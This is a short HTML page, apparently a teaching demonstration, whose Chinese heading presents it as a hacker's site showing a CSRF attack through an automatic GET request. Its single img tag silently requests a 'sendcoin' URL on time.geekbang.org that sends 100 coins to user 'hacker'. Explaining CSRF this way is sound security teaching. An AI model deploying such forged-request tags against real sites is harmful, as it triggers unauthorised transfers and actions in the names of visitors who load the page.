<!DOCTYPE html>
<html>
  <body>
    <h1>黑客的站点：CSRF攻击演示 -- 自动发起 Get 请求</h1>
    <!-- 会额外发送请求, 打开开发者工具就可以看到 -->
    <img src="https://time.geekbang.org/sendcoin?user=hacker&number=100">
  </body>
</html>